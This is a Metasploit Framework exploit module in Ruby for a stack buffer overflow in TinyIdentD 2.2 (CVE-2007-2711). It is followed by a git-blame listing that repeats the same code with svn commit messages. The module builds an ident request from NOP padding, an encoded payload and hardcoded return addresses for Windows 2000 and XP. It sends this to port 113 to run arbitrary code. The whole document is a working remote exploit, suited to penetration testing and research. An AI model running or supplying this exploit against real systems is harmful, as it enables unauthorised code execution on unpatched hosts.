metasploit-framework/modules/exploits/windows/misc/tiny_identd_overflow.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'TinyIdentD 2.2 Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack based buffer overflow in TinyIdentD version 2.2.
				If we send a long string to the ident service we can overwrite the return
				address and execute arbitrary code. Credit to Maarten Boone.
			},
			'Author'         => 'Jacopo Cervini <acaro[at]jervus.it>',
			'References'     =>
				[
					['CVE', '2007-2711'],
					['OSVDB', '36053'],
					['BID', '23981'],
				],
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0d\x20\x0a"
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 Server SP4 English',   { 'Ret' => 0x7c2d15e7, } ], # call esi
					['Windows XP SP2 Italian',            { 'Ret' => 0x77f46eda, } ], # call esi

				],
			'Privileged'     => false,
			'DisclosureDate' => 'May 14 2007'
			))

		register_options([ Opt::RPORT(113) ], self.class)
	end

	def exploit
		connect

		pattern  = "\xeb\x20"+", 28 : USERID : UNIX :";
		pattern << make_nops(0x1eb - payload.encoded.length)
		pattern << payload.encoded
		pattern << [ target.ret ].pack('V')


		request  = pattern + "\n"

		print_status("Trying #{target.name} using address at #{"0x%.8x" % target.ret }...")

		sock.put(request)


		handler
		disconnect
	end

end
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`##`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`# This file is part of the Metasploit Framework and may be subject to`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`##`

			`require 'msf/core'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! git-svn-id: file:///home/svn/framework3/trunk@7724 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-06 05:50:37 +00:00			`Rank = AverageRanking`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
stop perpetuating the ambiguity! git-svn-id: file:///home/svn/framework3/trunk@9262 4d416f70-5f16-0410-b530-b9f4589650da 2010-05-09 17:45:00 +00:00			`'Name' => 'TinyIdentD 2.2 Stack Buffer Overflow',`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`'Description' => %q{`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`This module exploits a stack based buffer overflow in TinyIdentD version 2.2.`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`If we send a long string to the ident service we can overwrite the return`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`address and execute arbitrary code. Credit to Maarten Boone.`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`},`
			`'Author' => 'Jacopo Cervini <acaro[at]jervus.it>',`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`'References' =>`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`[`
tons of indentation fixes, some other style tweaks git-svn-id: file:///home/svn/framework3/trunk@10394 4d416f70-5f16-0410-b530-b9f4589650da 2010-09-20 08:06:27 +00:00			`['CVE', '2007-2711'],`
Updated osvdb references from Steve Tornio, updated capture/eth_spoof modules git-svn-id: file:///home/svn/framework3/trunk@6907 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-27 14:05:23 +00:00			`['OSVDB', '36053'],`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`['BID', '23981'],`
			`],`
			`'Payload' =>`
			`{`
			`'Space' => 400,`
			`'BadChars' => "\x00\x0d\x20\x0a"`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`['Windows 2000 Server SP4 English', { 'Ret' => 0x7c2d15e7, } ], # call esi`
			`['Windows XP SP2 Italian', { 'Ret' => 0x77f46eda, } ], # call esi`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`],`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`'Privileged' => false,`
			`'DisclosureDate' => 'May 14 2007'`
			`))`

big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`register_options([ Opt::RPORT(113) ], self.class)`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`end`

			`def exploit`
			`connect`

			`pattern = "\xeb\x20"+", 28 : USERID : UNIX :";`
			`pattern << make_nops(0x1eb - payload.encoded.length)`
			`pattern << payload.encoded`
			`pattern << [ target.ret ].pack('V')`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
			`request = pattern + "\n"`

			`print_status("Trying #{target.name} using address at #{"0x%.8x" % target.ret }...")`

			`sock.put(request)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
			`handler`
			`disconnect`
			`end`

Updated osvdb references from Steve Tornio, updated capture/eth_spoof modules git-svn-id: file:///home/svn/framework3/trunk@6907 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-27 14:05:23 +00:00			`end`